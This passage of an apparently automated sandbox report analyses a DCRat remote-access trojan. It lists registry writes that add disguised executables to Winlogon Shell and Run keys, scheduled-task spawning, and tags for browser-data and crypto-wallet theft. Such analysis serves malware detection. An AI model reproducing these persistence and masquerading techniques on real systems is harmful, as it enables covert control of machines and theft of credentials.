\"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Event Triggered Execution: AppInit DLLs
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\winNet\\wscript.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Downloaded Program Files\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\winNet\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
